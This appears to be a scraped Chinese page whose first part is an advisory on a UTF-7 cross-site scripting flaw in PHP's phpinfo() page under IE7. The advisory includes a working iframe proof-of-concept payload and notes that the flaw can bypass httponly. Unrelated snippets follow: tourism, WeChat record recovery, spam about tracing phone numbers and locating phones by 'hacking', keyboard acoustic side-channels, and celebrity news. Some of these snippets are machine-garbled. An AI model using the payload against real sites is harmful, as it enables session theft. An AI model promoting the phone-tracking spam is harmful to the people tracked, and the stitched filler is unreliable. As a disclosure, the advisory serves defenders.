漏洞说明: php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数,许多站点和程序都会将phpinfo放在自己的站点上或者在程序里显示,但是phpinfo里存在一些安全问题,导致精心构造数据就可以产生一个跨站脚本漏洞,可以被用来进行攻击。
漏洞成因: phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以让它自动选择编码或者通过一个iframe页面给它指定编码,这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。
漏洞来源: http://www.80sec.com/
漏洞利用: 利用代码如下:
<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php?+ADw-SCRIPT+AD4-alert(document.domain);+ADw-/SCRIPT+AD4-=1">
以上代码在IE7+php 5.2.6测试成功。phpinfo页面的xss甚至比其他页面更加危险,因为如果有phpinfo的存在,恶意攻击者可以利用phpinfo的输出bypass如httponly和一些基础认证。
漏洞影响: 影响所有版本的php和浏览器IE7
漏洞修补: 建议暂时删除站点的phpinfo页面避免被人利用。
金佛山是重庆很是出名的5A旅游风景区,这里山清水秀,气候宜人,因此广受重庆人还有外地游客青睐。夏天可以去避暑,冬天可以去赏雪,眼下已经是冬季了,大家比较关注的问题应该就是金佛山一月份下雪了吗这个问...
怎么查询微信聊天记录 咱们奈何才气完全删除微信谈天纪录呢?许多用户都有按期清算微信谈天纪录的习气。不过,这种技巧不能够完全删除手机中的数据。简略删除微信谈天纪录也能够应用职业的数据规复软件举行规复。...
3月7日消息,谷歌威胁分析团队的研究员Clement Lecigne 在Chrome中发现并报告了一个高危漏洞,可导致远程攻击者执行任意代码并完全控制计算机。微信号查手机号黑科技研究人员称,此次Chr...
移动电话教程黑客的黑客位置教你如何定位手机位置不管你做什么,那个曾经缠着你的男人现在只给你很多冰冷难忘的回忆,但这已经成为你心中的一种痛苦,你不能放弃;黑客定位手机位置教程1.对男朋友来说,无情地与女...
本文会讲解一些关于keytap工具的技术细节。我也会分享一些自己关于这个项目的几点想法。这个项目已经开源,源码在这里可以下载。描述该工具的主要目标是利用敲击键盘时产生的声音作为一种边信道攻击来猜测输入...
冯提莫要去MAMA的新闻,还是韩网ins官宣的,看来已成定局。冯提莫是一个从lol开始进入人们视野的,以甜美的声音和娇小可人的形象走红,现在渐渐走上大舞台,演艺道路是逐渐明朗。那么她的实力也是受到观众...